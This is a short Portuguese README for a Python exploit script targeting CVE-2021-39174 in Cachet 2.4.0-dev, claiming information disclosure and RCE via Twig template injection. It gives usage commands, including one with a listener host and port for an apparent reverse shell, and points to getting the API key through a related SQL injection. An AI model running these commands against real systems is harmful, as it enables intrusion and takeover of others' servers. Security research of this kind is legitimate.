
CVE-2021-39174 Cachet 2.4.0-dev
Um script em python3 para CVE-2021-39174 Cachet 2.4.0-dev - Divulgação de Informações e RCE via Injeção de Template no Servidor Twig. Para o RCE, a CHAVE DE API do usuário é necessária. Confira o link Leave Songs abaixo, que cobre como obter a CHAVE DE API via Injeção SQL CVE-2021-39165.
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password -k API_KEY -lhost 127.0.0.1 -lport 1337
Para o menu de ajuda:
python3 cachet_2.4.0-dev.py -h
Todo o código fornecido neste repositório é apenas para fins educacionais/de pesquisa. Quaisquer ações e/ou atividades relacionadas ao material contido neste repositório são de sua inteira responsabilidade. O uso indevido do código neste repositório pode resultar em acusações criminais contra as pessoas envolvidas. O autor não será responsabilizado no caso de quaisquer acusações criminais serem apresentadas contra indivíduos que usarem indevidamente o código deste repositório para infringir a lei.